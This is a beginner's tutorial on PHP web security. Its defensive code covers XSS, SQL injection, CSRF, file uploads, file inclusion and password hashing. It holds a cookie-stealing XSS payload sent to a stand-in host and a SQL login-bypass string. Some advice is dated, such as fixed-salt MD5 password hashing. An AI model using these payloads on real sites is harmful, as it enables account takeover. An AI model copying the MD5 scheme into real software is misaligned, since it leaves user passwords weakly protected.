PHP Security: XSS, SQL Injection, Spoofed Form Input, CSRF, File Uploads, Including Files, eval(), Register Globals, Magic Quotes

Introduction
Different Types of Attack
XSS
SQL Injection
Spoofed Form Input
CSRF
File Uploads
Including Files
eval()
Register Globals
Magic Quotes
Error Reporting
PHP 5
Plain Text Passwords
Taking it further: Salting
Conclusion

Introduction

Since PHP is a very high-level scripting language, some of the potential security flaws that many languages present are totally irrelevant to it: you don’t have to manage your memory, for example, and thus don’t have to worry about things like buffer overflows. Being a high-level language also means that PHP is much easier to learn; however, this is possibly the biggest problem with the language as a whole. Many people learn PHP as a first language and overlook some of the fundamental considerations one must make when writing programs, particularly ones as public as most web applications.

This guide aims to familiarise you with some of the basic concepts of online security and teach you how to write more secure PHP scripts. It’s aimed squarely at beginners, but I hope that it still has something to offer more advanced users. Enjoy.

Different Types of Attack

XSS

XSS stands for “Cross Site Scripting”, and refers to the act of inserting content, such as JavaScript, into a page. Usually these attacks are used to steal cookies, which often contain sensitive data such as login information.

An example of a script vulnerable to XSS is this simple script to fetch a news item based on its ID:

[php]
$id = $_GET['id'];

echo 'Displaying news item number ' . $id;

/* snip */
[/php]

Now, if $_GET['id'] contains a number, then all’s well and good. But what happens if it contains this?

[php]
<script>
window.location.href = "http://evildomain.com/cookie-stealer.php?c=" + document.cookie;
</script>
[/php]

If an attacker placed this simple JavaScript in the id parameter of a link to the page and convinced a user to click it, the script would be executed in the user’s browser and pass the user’s cookie data on to the attacker, allowing them to log in as the user. It’s really that simple.

Firstly, you must never implicitly trust user input. Always presume that every bit of input contains an attack, and code to account for that. To do this, you need to filter user input so that no JavaScript can be run. The easiest way to do this is with PHP’s built-in strip_tags() function, which will remove HTML tags from a string. If you just want to make the HTML safe without removing it altogether, then you need to run the input through htmlentities() or htmlspecialchars(), which will convert < and > to &lt; and &gt; respectively. Escaping at the point of output is generally the more robust choice, since strip_tags() does not escape quotes and so does not protect values placed inside HTML attributes.
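
As a minimal sketch of the escaping approach, the news example could be written along these lines. The escape_html() helper is a hypothetical name of my own, and the hard-coded $id stands in for a malicious $_GET['id'] value.

```php
<?php
// Hypothetical helper: escape a value for output inside HTML text
// or inside a quoted HTML attribute.
function escape_html($value)
{
    // ENT_QUOTES converts single and double quotes as well as <, > and &.
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Simulated malicious input, standing in for $_GET['id'].
$id = '<script>alert(1)</script>';

// The tags are printed as harmless text rather than being run by the browser.
echo 'Displaying news item number ' . escape_html($id);
```

Since the ID is meant to be a number, passing it through intval() before use would be an equally reasonable choice here.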

SQL Injection

Many sites use databases as a backend to store their data, using queries to insert and select data from it. However, many people are unaware that such sites are often vulnerable to a form of attack called SQL injection.

SQL injection is when malformed user input is used directly and deliberately in an SQL query, in a way that allows the attacker to manipulate the query. This means that an attacker could delete portions of your database, make himself an admin account etc—the possibilities are endless.

One of the most common vulnerabilities is when logging in to a site. Take this example:

[php]
$username = $_POST['username'];
$password = $_POST['password'];

// Vulnerable: user input is placed directly into the query.
$result = mysql_query("
SELECT *
FROM
site_users
WHERE
username = '$username'
AND
password = '$password'
");

if ( mysql_num_rows($result) > 0 ) {
    // logged in
}
[/php]

This is vulnerable to a pretty obvious SQL injection; can you work out how an attacker could modify the query to allow himself to be logged in regardless of whether or not he has the right password?

If the attacker enters a valid username in the username field (“rob”, say) and the following in the password field:

[php]
' OR '1'='1
[/php]

The resulting query will look like this:

[php]
SELECT *
FROM
site_users
WHERE
username = 'rob'
AND
password = '' OR '1'='1'
[/php]

Because AND binds more tightly than OR, the query will select all users where either:

the username is “rob” and the “password” field is empty, or
'1' is equal to '1'

Since the last criterion will always be true (when is 1 ever not equal to 1?), the query returns rows and the attacker will be logged in without knowing rob’s password. Eek!

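As with XSS attacks, you must never trust user input. The best way of cleaning user input for the mysql extension is PHP’s built-in mysql_real_escape_string() function; this will escape characters such as ' and ", making them useless in “breaking out” of a quoted string as in the above example. If you’re using a number in your query, then you should use intval() on the inputted number to ensure it is numeric. Note that the mysql_* functions were deprecated in PHP 5.5 and removed in PHP 7; with their replacements, mysqli and PDO, prepared statements keep user input separate from the query text altogether.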
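
Here is a rough sketch of the login check using a PDO prepared statement. It assumes the pdo_sqlite extension is available and uses an in-memory SQLite database purely so that it can be run on its own; credentials_match() is a hypothetical helper, and the password is stored in plain text only to mirror the example above.

```php
<?php
// In-memory SQLite database, used only so the sketch is self-contained.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE site_users (username TEXT, password TEXT)');
$db->exec("INSERT INTO site_users VALUES ('rob', 'secret')");

// Hypothetical helper: returns true if a row matches both values.
function credentials_match(PDO $db, $username, $password)
{
    // The ? placeholders are filled in by the driver, so the input
    // is always treated as data and never as part of the SQL.
    $stmt = $db->prepare(
        'SELECT COUNT(*) FROM site_users WHERE username = ? AND password = ?'
    );
    $stmt->execute(array($username, $password));

    return (int) $stmt->fetchColumn() > 0;
}

var_dump(credentials_match($db, 'rob', "' OR '1'='1")); // injection attempt: bool(false)
var_dump(credentials_match($db, 'rob', 'secret'));      // correct password: bool(true)
```

The injection string from earlier is simply compared against the password column as an ordinary value, so it no longer changes the meaning of the query.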

Spoofed Form Input

As an extension of the above two points, it’s important to remember that input sent to your script may not have been sent from the form you created. This means that, although you might have data in checkboxes, radio buttons, selects or other “read-only” elements, they might contain values that were never in the elements you created and thus need filtering just like inputs and textareas.

This also means that you cannot rely solely on client-side validation. Whilst it’s nice to have errors pointed out to the user without having to reload a page (and possibly lose all of their input), using client-side validation as a security measure is not sensible. Make sure you check all input server-side, in your PHP scripts, before you do anything like insert it into a database.
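
As a small illustration of checking a “read-only” element server-side, here is a sketch that only accepts values the form actually offered. The colour field, the list of options and the validated_choice() helper are all made up for the example.

```php
<?php
// Hypothetical list of the options offered by a <select name="colour"> element.
$allowedColours = array('red', 'green', 'blue');

// Returns the submitted value if it is one of the allowed options, otherwise null.
function validated_choice($submitted, array $allowed)
{
    // The third argument enables strict comparison, so only exact string matches pass.
    return in_array($submitted, $allowed, true) ? $submitted : null;
}

$submitted = isset($_POST['colour']) ? $_POST['colour'] : null;
$colour = validated_choice($submitted, $allowedColours);

if ($colour === null) {
    // Reject the request rather than guessing what the user meant.
    echo 'Invalid colour.';
}
```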

See the CSRF section below for more details on how to avoid spoofed form input.

CSRF

CSRF stands for “Cross-Site Request Forgery”, and CSRF attacks are similar in scope and methodology to XSS attacks. CSRF attacks usually either exploit the fact that many websites perform actions on HTTP GET requests—deleting blog posts, buying items etc.—or spoof a client request to a resource so that the website believes the request is genuine. Either way, the victim performs an action on a website that trusts him—usually his own—that he did not intend to happen.

First, we’ll begin with an example attack, then we’ll look at some ways of defending against such attacks.

Many websites allow you to perform actions at the click of a link, such as deleting a forum post. Usually, the URLs that perform these sorts of actions look a little like this:

http://example.com/forum/deletepost.php?id=392

deletepost.php will typically check that the user performing the request is logged in, and if so perform the requested action (in this case, deleting the post with the id of 392). However, this method of authentication leaves open a massive security flaw: what if a privileged user, a forum moderator for example, were to be tricked or forced into visiting this URL? The post would be deleted, but that’s not what the moderator wanted. An attacker could even go further: if the URL were used as the src of an HTML image tag on another page, for example, the privileged user would likely not even know that they had performed the action.

How, then, can we avoid such attacks? There are two methods that, when used together, make CSRF attacks far harder to carry out.

The first is rather simple: never, ever use GET for any critical task. Instead, use a POST form. Such requests are harder to forge and have the added bonus that they are impossible to load into HTML image/script tags, eliminating an attacker’s ability to exploit your site remotely.

The second is to make sure all requests originate from your own forms, eliminating the possibility that the request could have been loaded from a fake form on a different webpage. To do this, we can create a value (known by some as a “nonce”, but here referred to as a “token”) that is created especially for the form, submitted along with it, and checked, along with the usual permission checks, before the action is performed.

Here’s an example that creates and checks a token before deleting a forum post:

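[php]
<?php

session_start();

if( !empty($_POST['post_id']) ) {
    // $user is assumed to have been loaded elsewhere, e.g. from the session.
    if( !$user->is_a_moderator )
        die;
    // Reject the request if the token is missing or does not match.
    if( empty($_POST['token']) || empty($_SESSION['token']) || $_POST['token'] !== $_SESSION['token'] )
        die;

    // All fine: delete the post.
    delete_post( intval($_POST['post_id']) );

    // Unset the token, so that it cannot be used again.
    unset($_SESSION['token']);
}

// Generate a fresh token for the form below.
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;

?>
[/php]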

 

[php]
<form method="post">

<p>Post ID to delete:</p>
<p><input type="text" name="post_id" /></p>

<input type="hidden" name="token" value="<?php echo $token; ?>" />

<p><input type="submit" value="Delete post" /></p>

</form>
[/php]

As we can see, using a POST form with a generated token is simple and straightforward, and it closes off the CSRF attacks described above.
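
On newer versions of PHP, the token handling could be sketched with stronger building blocks. This assumes PHP 7 or later for random_bytes(); the two function names are hypothetical, and the session array is passed in by reference so the sketch can be tried without a real session.

```php
<?php
// Assumes PHP 7 or later for random_bytes().

// Create a fresh token, store it in the session array and return it.
function csrf_issue_token(array &$session)
{
    $session['token'] = bin2hex(random_bytes(32));

    return $session['token'];
}

// Check a submitted token against the stored one, then discard it.
function csrf_check_token(array &$session, $submitted)
{
    $expected = isset($session['token']) ? $session['token'] : '';
    unset($session['token']); // single use, as in the example above

    // hash_equals() compares in constant time; it needs two strings.
    return is_string($submitted)
        && $expected !== ''
        && hash_equals($expected, $submitted);
}
```

In a real page you would call csrf_issue_token($_SESSION) when rendering the form and csrf_check_token($_SESSION, $_POST['token']) (after checking the field exists) before performing the action.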

File Uploads

File uploads are potentially the biggest security risk in web development. Allowing a third-party to place files on your server could allow them to delete your files, empty your database, gain user details and much more.

However, it’s certainly possible to upload files safely, and such functionality can be a great feature of your site.

When allowing users to upload files from their local machine to your server, there are two things that you need to check. The first is the mime-type of the uploaded file; if your script is uploading images, for example, you’ll want to just accept image/png, image/jpeg, image/gif, image/x-png and image/pjpeg. Bear in mind that $_FILES['image']['type'] is simply whatever the browser reported. You can check it as follows:

[php]
$validMimes = array(
    'image/png',
    'image/x-png',
    'image/gif',
    'image/jpeg',
    'image/pjpeg'
);

$image = $_FILES['image'];

if(!in_array($image['type'], $validMimes)) {
    die('Sorry, but the file type you tried to upload is invalid; only images are allowed.');
}

// Do something with the uploaded file.
[/php]

The second thing to check is the file extension. It’s certainly possible to spoof a mime-type; one vector is to take an image, insert PHP code into the sections the file format allows for meta data, give it a .php extension, and upload it. In this case, your mime-checking would think the file was an image, upload it, and allow execution of the PHP code within.

To avoid this, you should manually assign files an extension based on their mime-type. We could extend our above example to take this into account:

[php]
$validMimes = array(
    'image/png' => '.png',
    'image/x-png' => '.png',
    'image/gif' => '.gif',
    'image/jpeg' => '.jpg',
    'image/pjpeg' => '.jpg'
);

$image = $_FILES['image'];

if(!array_key_exists($image['type'], $validMimes)) {
    die('Sorry, but the file type you tried to upload is invalid; only images are allowed.');
}

// Get the filename minus any directory part and file extension:
$filename = pathinfo(basename($image['name']), PATHINFO_FILENAME);

// Append the appropriate extension
$filename .= $validMimes[$image['type']];

// Do something with the uploaded file
[/php]

You can see how the above attack is avoided; if the image containing the PHP code was called foo.php and was a PNG, it would be renamed to foo.png and the code would not be executed.
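
The renaming step can be wrapped up in a small function, sketched below. safe_upload_name() is a hypothetical helper of my own; it takes the MIME type as a parameter so that you can pass in a type detected on the server (for instance with the fileinfo extension, shown in the comment) rather than the one the browser claimed.

```php
<?php
// Map of accepted MIME types to the extension that will be assigned.
$validMimes = array(
    'image/png'  => '.png',
    'image/gif'  => '.gif',
    'image/jpeg' => '.jpg',
);

// Hypothetical helper: build a safe file name from a detected MIME type
// and the client-supplied name. Returns null if the type is not allowed.
function safe_upload_name($detectedMime, $originalName, array $validMimes)
{
    if (!is_string($detectedMime) || !isset($validMimes[$detectedMime])) {
        return null;
    }

    // Keep only the base name without its extension, then drop unusual characters.
    $base = pathinfo(basename($originalName), PATHINFO_FILENAME);
    $base = preg_replace('/[^A-Za-z0-9_-]/', '', $base);

    if ($base === '') {
        $base = 'upload';
    }

    return $base . $validMimes[$detectedMime];
}

// With a real upload, the type could be detected from the file contents:
// $finfo = new finfo(FILEINFO_MIME_TYPE);
// $mime  = $finfo->file($_FILES['image']['tmp_name']);
echo safe_upload_name('image/png', 'foo.php', $validMimes); // prints foo.png
```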

Including Files

Never, ever include files based on user input without thoroughly checking said input first. One of the major culprits of this is the ubiquitous index.php?page=something.php script that so many people love to use:

[php]
include $_GET[‘page’];
[/php]

By doing so, you can make maintenance of your site much easier; you can keep content in individual files, and make changes to areas such as the navigation in just one file and have them appear globally, much like frames but without the client-side disadvantages they bring. However, there is a problem with this method; it allows the user to specify whatever file they like, giving them access to the contents of any file on the server that your PHP script has permission to open. Even worse, if the PHP directive allow_url_fopen (together with allow_url_include, on PHP 5.2 and later) is turned on, an attacker can open files from another server and execute any PHP code within them, since the script uses include and not something like echo file_get_contents(). This gives them complete control of your webserver and the files on it. As you can see, this is very bad.

You can prevent this in one of two ways. If you only have a few pages, you can make a white-list of pages that are allowed, like so:

[php]
switch($_GET['page']) {
    case "about":
        include('about.php');
        break;
    case "news":
        include('news.php');
        break;
    default:
        include('home.php');
        break;
}
[/php]

This method means that only the pages you explicitly and specifically allow can be included into the page, removing any possibility of an attack. However, it’s rather cumbersome—every time you add a new page, you have to edit this file and add it to the whitelist.

So, a better method would be to simply clean the input to make sure that it’s safe. This strikes a balance between the ease-of-use of the first method and the security of the second.

[php]
$page = preg_replace('/\W/si', '', $_GET['page']);

include('./' . $page . '.php');
[/php]

In this particular script, we take two steps to make sure that the file is valid. The first, scary-looking line is a regular expression, which removes all non-word characters (that is, anything other than letters, digits and underscores) from the input. This means that an attacker cannot traverse directories using .., or input a URL: http://www.google.com, for example, would be filtered to httpwwwgooglecom, which is useless but safe. The second line then fixes the directory and the .php extension, so only PHP files in the current directory can be included.
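
One possible refinement, sketched here under my own assumptions, is to also check that the cleaned name points at a real file before including it. resolve_page() and the pages directory are hypothetical names used only for this example.

```php
<?php
// Hypothetical helper: turn a requested page name into a path inside $dir,
// or return null if the name is unusable or the file does not exist.
function resolve_page($requested, $dir)
{
    // Keep only letters, digits and underscores, as in the regular expression above.
    $page = preg_replace('/\W/', '', (string) $requested);

    if ($page === '') {
        return null;
    }

    $path = $dir . '/' . $page . '.php';

    return is_file($path) ? $path : null;
}

// Pages are assumed to live in a "pages" directory next to this script.
$requested = isset($_GET['page']) ? $_GET['page'] : 'home';
$path = resolve_page($requested, __DIR__ . '/pages');

if ($path === null) {
    echo 'Page not found.';
} else {
    include $path;
}
```

Keeping the includable pages in a directory of their own also stops visitors from pulling in scripts that were never meant to be pages.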

Another related point is the naming of included files. Many scripts store their settings in external files to make it easy for end-users to change them. If you’re working on a script that does this, be sure to name your included files with an extension that isn’t displayed as plain text. Many scripts use .inc, which by default is displayed as a regular text file in most web servers. This could give users access to sensitive information such as database details and user info. The best option is to name the files with an extension of PHP; that way, if a user requests the files, they’ll simply be greeted with a blank page.

If you’re using Apache, and using a script that insists on using INC files, then you can use this setting to disallow direct access to .inc files:

[php]
<files ~ "\.inc$">
Order allow,deny
Deny from all
</files>
[/php]

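This should be placed in a file called .htaccess, in your top-level directory. It basically disallows end-users from viewing .inc files, but still allows scripts to include and use them. The Order and Deny directives are Apache 2.2 syntax; on Apache 2.4 and later the equivalent is Require all denied.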

eval()

eval() is a useful but very dangerous function that allows you to execute a string as PHP code. There aren’t many occasions where this is necessary, and being realistic you should avoid its usage, especially if you want to use user input in the string.
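
Often what looks like a job for eval() can be done with a fixed table of functions instead. The following is only a sketch of that idea; the operation names and the run_operation() helper are invented for the example.

```php
<?php
// Hypothetical example: the user picks an operation by name.
// Rather than building PHP code from the name and passing it to eval(),
// look the name up in a fixed table of functions.
$operations = array(
    'add'      => function ($a, $b) { return $a + $b; },
    'multiply' => function ($a, $b) { return $a * $b; },
);

function run_operation(array $operations, $name, $a, $b)
{
    // Anything that is not a known name is refused outright.
    if (!is_string($name) || !isset($operations[$name])) {
        throw new InvalidArgumentException('Unknown operation');
    }

    return call_user_func($operations[$name], $a, $b);
}

echo run_operation($operations, 'add', 2, 3); // prints 5
```

Because only the functions listed in the table can ever run, user input chooses between options rather than supplying code.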

Register Globals

register_globals is a PHP setting that automatically takes data from the superglobal arrays ($_GET, $_POST, $_SERVER, $_COOKIE, $_REQUEST and $_FILES) and assigns them to global variables; $_POST['message'] would automatically be assigned to $message, for example. This setting has been disabled by default since PHP 4.2 and was removed entirely in PHP 5.4, and with good reason. Take this example:

[php]
if($_POST['username'] == 'rob' && $_POST['password'] == 'foo') {
    $authenticated = true;
}

if($authenticated) {
    // do some admin thing
}
[/php]

Now, with register_globals turned off, this script works as intended; $authenticated is only set if the user has entered the correct password. However, with register_globals turned on, a malicious user could run the script as

script.php?authenticated=true

and he would automatically be granted admin rights.

There’s not a whole lot you can do about this setting if you’re using shared hosting, but you can code your scripts so that they aren’t affected by any malicious exploitation of register_globals. The above example, for instance, would become:

[php]
$authenticated = false;

if($_POST['username'] == 'rob' && $_POST['password'] == 'foo') {
    $authenticated = true;
}

if($authenticated) {
    // do some admin thing
}
[/php]

By explicitly setting $authenticated to false, we avoid any potential overrides through register_globals.

Magic Quotes

Magic Quotes were an attempt by the PHP developers to add some default security into PHP; when the magic_quotes_gpc setting is turned on, all ' (single quote), " (double quote), \ (backslash) and NUL characters are escaped with a backslash automatically. Note that this is NOT the same as mysql_real_escape_string(), and by turning it on you do NOT prevent all SQL injection attacks. This is the first problem. (The feature was deprecated in PHP 5.3 and removed in PHP 5.4.)

The second is that they pose a portability nightmare. Some hosts have the setting on, and others don’t; if you’re writing a script that’s going to be used on multiple systems, you need to check whether magic quotes is turned on and act appropriately.

However, there are solutions to this. One method is to check if the setting is turned on and, if it isn’t, add magic quotes yourself:

[php]
function add_magic_quotes($array) {
    foreach ($array as $k => $v) {
        if (is_array($v)) {
            $array[$k] = add_magic_quotes($v);
        } else {
            $array[$k] = addslashes($v);
        }
    }
    return $array;
}
if (!get_magic_quotes_gpc()) {
    $_GET = add_magic_quotes($_GET);
    $_POST = add_magic_quotes($_POST);
    $_COOKIE = add_magic_quotes($_COOKIE);
}
[/php]

Alternatively, you can do the opposite, and remove the slashes if magic quotes are turned on:

[php]
function remove_magic_quotes($array) {
    foreach ($array as $k => $v) {
        if (is_array($v)) {
            $array[$k] = remove_magic_quotes($v);
        } else {
            $array[$k] = stripslashes($v);
        }
    }
    return $array;
}
if (get_magic_quotes_gpc()) {
    $_GET = remove_magic_quotes($_GET);
    $_POST = remove_magic_quotes($_POST);
    $_COOKIE = remove_magic_quotes($_COOKIE);
}
[/php]

Include either of these methods at the top of your main include, and rest easy.

Error Reporting

If you have error reporting turned on fully, important information can be displayed in the event of an error—even a relatively minor one. PHP provides a function called error_reporting() that allows you to change the level of error reporting on a per-script basis.

Whilst in development, you should take advantage of this function to display all errors, warnings and notices, like so:

[php]
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
[/php]

This helps to avoid any errors appearing on production sites that you’d missed in development, and helps you produce better code, especially since notices are usually about flaws in style.

However, when you put your site into production, this level of detail can be dangerous. You can’t foresee all errors during development: your program could run out of memory or disk space, for example. So, for safety’s sake, on production sites you should disable the displaying of errors and instead log them to a file safely outside of your document root; this way, the public can’t see if anything goes wrong, but you can. Here’s a simple bit of code that will accomplish this:

[php]
error_reporting(E_ALL^E_NOTICE); // This is a 'sensible' reporting level
ini_set('display_errors', 0); // Hide all error messages from the public
ini_set('log_errors', 1);
ini_set('error_log', 'path/to_your/log.txt'); // Preferably a location outside of your web root
[/php]

Be sure to edit the path to the error log so that it’s a correct path and one that is writeable by the server process—and check regularly for errors.

PHP also offers a function, set_error_handler(), that allows you to write your own error handling function that is called when an error occurs. This way, you could implement a much more sophisticated system, perhaps displaying errors to admins or giving a “nice” message to users when the site is down, rather than a confusing PHP-generated error or even a blank page.
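
A very small sketch of such a handler follows. It collects messages in an array purely so that it is self-contained; a real handler would more likely write to a log with error_log(). The $loggedErrors variable and the wording of the messages are my own inventions.

```php
<?php
// Hypothetical in-memory log so the sketch is self-contained;
// a real handler would more likely call error_log().
$loggedErrors = array();

set_error_handler(function ($severity, $message, $file, $line) use (&$loggedErrors) {
    // Record the details for the developer...
    $loggedErrors[] = sprintf('[%d] %s in %s on line %d', $severity, $message, $file, $line);

    // ...and show the visitor something generic.
    echo "Sorry, something went wrong.\n";

    // Returning true tells PHP not to run its built-in handler as well.
    return true;
});

// Simulate a problem.
trigger_error('Could not load news item', E_USER_WARNING);
```

Note that a handler registered this way is not called for fatal errors such as parse errors, so the display_errors and log_errors settings above are still worth having.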

Another important thing that people sometimes miss is MySQL error reporting. A useful tip for development is to print error reports when a query fails so you can see what went wrong, like so:

[php]
mysql_query('
SELECT *
FROM table_that_doesnt_exist
') or die(mysql_error());
[/php]

During development, this is great—it allows you to see quickly that the table doesn’t exist, and that’s why it’s breaking. However, you should never leave this on in a production environment; if there happens to be an error, you should log the error appropriately and give a generic error message to the user if it’s critical. If you don’t, an attacker can find out important information about your database schema and even some login information.

PHP 5

PHP 5 offers error reporting that is worlds away from the simple system in PHP 4. One of the most important additions is the ability to throw and catch exceptions, a feature that many languages have offered for years but PHP has only just picked up.

When a function encounters an exceptional circumstance it can raise—or throw—an exception. The code executing that function can then try the function, catch any exceptions that occur and act accordingly. If the exception is not caught, your script will display a fatal error and halt execution.

Here’s some example code that should make things a bit clearer for you:

[php]
function getData($filename) {

    if(!file_exists($filename)) {
        throw new Exception('File does not exist');
    }

    if(filesize($filename) == 0) {
        throw new Exception('File is empty');
    }

    // If any of the above exceptions are thrown,
    // this code will not be executed:
    return file_get_contents($filename);

}

try {
    getData('file.txt');
}
catch(Exception $e) {
    echo 'There was an error opening the file: ' . $e->getMessage();
}
[/php]

You may also extend the exception class: the PHP manual has some great information on the subject.

As you can see, exceptions are a great way of avoiding the display of nasty PHP errors and maintaining the integrity of your code, especially when you do a little more with the catch section than simply display a message. You can keep your code running even if a severe error occurs, and by extending Exception you can make the source of errors clear to other developers.

However, exceptions are quite performance intensive and not always useful to the end user; use them sparingly and know when to use default error handling instead.
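
To illustrate extending Exception, here is a sketch of the earlier getData() example with its own exception class. FileDataException is a hypothetical name, and the file name is deliberately one that should not exist.

```php
<?php
// Hypothetical subclass, so callers can tell file problems apart from other errors.
class FileDataException extends Exception
{
}

function getData($filename)
{
    if (!file_exists($filename)) {
        throw new FileDataException('File does not exist');
    }

    if (filesize($filename) == 0) {
        throw new FileDataException('File is empty');
    }

    return file_get_contents($filename);
}

try {
    $data = getData('file-that-does-not-exist.txt');
} catch (FileDataException $e) {
    // Only file-related problems end up here; a real site might log the
    // details and carry on with a sensible default.
    $data = '';
    echo 'There was an error opening the file: ' . $e->getMessage();
}
```

Any other kind of exception would pass straight through this catch block, which makes it easier to handle different failures in different places.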

Plain Text Passwords

When storing passwords, it’s important never to store them in plain text. The reasoning behind this is that, if an attacker were ever to gain access to your database or to a user’s cookies, they would know the user’s password which they could potentially use on many other sites—as well as the fact that they would be able to log in as that user on your site.

How, then, can you hide the user’s actual password whilst also retaining the ability to check if a user’s password is correct when logging in? The answer is something called “hashing”. This way, you store a hash of the user’s password in the database, and hash the input when logging a user in; if the hashes match, the input is correct. This way, you never have to store the user’s actual password.

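Two long-established hashing functions are MD5 and SHA1, and PHP offers functions for both; SHA1 is generally regarded as the stronger of the two by professional cryptologists. Both are fast, general-purpose hashes, however, and are no longer considered adequate for storing passwords; since PHP 5.5, the built-in password_hash() and password_verify() functions are the recommended way to do this.

Here’s a quick example of the basic idea, using MD5 for illustration: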

[php]
$user_name = mysql_real_escape_string($_POST['username']);
$user_password = md5($_POST['password']);

$result = mysql_query('
SELECT COUNT(*) AS count
FROM users
WHERE user_name = "'.$user_name.'"
AND user_password = "'.$user_password.'"
');

$row = mysql_fetch_assoc($result);

if($row['count'] > 0) {
    // Password is okay.
}
[/php]

Also worth noting is that there’s no need to escape the MD5d password before inserting it into the database, since MD5 hashes are always hexadecimal strings.

Taking it further: Salting

Salting refers to the concept of adding an extra piece of information to the data we’re hashing before we hash it. This means that even if an attacker were to have a list of every known MD5/SHA1 hash (which is an absolute impossibility, naturally), plus the user’s password hash, they’d still not be able to derive the password from the hash by comparison unless they also knew the salt data, making precomputed dictionary attacks useless.

This is perhaps better explained with an example.

Let’s say a particularly unimaginative user chooses for their password the word “password”. If we don’t implement salting, the password is stored in the database as 5f4dcc3b5aa765d61d8327deb882cf99, the plain MD5 value of “password”.

If a hacker gains access to the password hash of a user, either from their cookie or from the database itself, they could then scan through a “dictionary” of words, hashing each one with MD5, until they found a hash that matched the user’s—they would then know that that particular word was the user’s password.

By introducing salting, however, we’d end up hashing the salt as well as the password, and storing that in the database. Given a relatively strong salt of “f963kjg”, our hash would become b9be01b2cf3d77fe60f6e8892d664606, and the attacker would never be able to gain access to the user’s password—not unless they had the string “f963kjgpassword” in their dictionary, anyway.

So, to use a salted hash, we simply hash the salt and the password together:

[php]
$salt = 'thequickbrownfox';
$password = 'foobar123';

$salted_hash = md5($salt . $password);
[/php]

And do the same when checking the password:

[php]
$salt = 'thequickbrownfox';

$user_name = mysql_real_escape_string($_POST['username']);
$user_password = md5($salt . $_POST['password']);

$result = mysql_query('
SELECT COUNT(*) AS count
FROM users
WHERE user_name = "'.$user_name.'"
AND user_password = "'.$user_password.'"
');

$row = mysql_fetch_assoc($result);

if($row['count'] > 0) {
    // Password is okay.
}
[/php]

Considering how simple a change salting is compared with the security benefits it brings, it’s certainly worth doing.
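
If you are on PHP 5.5 or later, the built-in password functions handle the salting for you. The sketch below assumes that version; password_matches() is just a hypothetical wrapper to show where the check would go at login.

```php
<?php
// Assumes PHP 5.5 or later, where password_hash() and password_verify() are built in.

// At registration: hash the password. A random salt is generated and stored
// inside the returned string, so no separate salt value is needed.
$stored_hash = password_hash('foobar123', PASSWORD_DEFAULT);

// At login: compare the submitted password with the stored hash.
function password_matches($submitted, $stored_hash)
{
    return password_verify($submitted, $stored_hash);
}

var_dump(password_matches('foobar123', $stored_hash)); // bool(true)
var_dump(password_matches('wrong', $stored_hash));     // bool(false)
```

Because each hash carries its own random salt, two users with the same password end up with different stored values.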

Conclusion

Hopefully this has made you a little more aware of the dangers that can face you when writing PHP scripts, and hopefully you’ve understood what I’ve tried to say. Remember: always presume that input is malformed, act accordingly, and you’ll be fine.